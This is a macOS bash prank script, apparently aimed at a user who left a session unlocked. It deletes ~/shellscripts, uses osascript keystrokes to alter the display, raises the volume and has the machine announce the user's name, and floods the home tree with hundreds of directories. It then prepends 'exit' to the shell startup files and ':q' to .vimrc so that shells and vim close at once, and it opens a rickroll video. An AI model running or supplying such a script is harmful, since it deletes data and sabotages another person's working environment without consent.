#!/bin/bash

cd ~/
rm -rf ~/shellscripts
osascript -e "tell application \"System Events\"" -e "key code 28 using {control down, option down, command down}" -e "end tell"
for i in `seq 1 15`;
do
	osascript -e "tell application \"System Events\"" -e "key code 47 using {control down, option down, command down}" -e "end tell"
done
osascript -e "set Volume 10"
say "Je suis $USER, et j'ai oublié de verrouiller ma session" -v "Thomas"
for i in `seq 1 100`;
do
	mkdir ~/*/*/$i
done
for i in `seq 1 100`;
do
	mkdir ~/*/$i
done
for i in `seq 1 100`;
do
	mkdir ~/$i
done
touch ~/.shrc
touch ~/.zshrc
touch ~/.bashrc
touch ~/.vimrc
sed -i '1s/^/exit\n/' ~/.shrc
sed -i '1s/^/exit\n/' ~/.zshrc
sed -i '1s/^/exit\n/' ~/.bashrc
sed -i '1s/^/:q\n/' ~/.vimrc
sleep 0.5
open https://www.youtube.com/watch?v=dQw4w9WgXcQ
sleep 5
pmset displaysleepnow
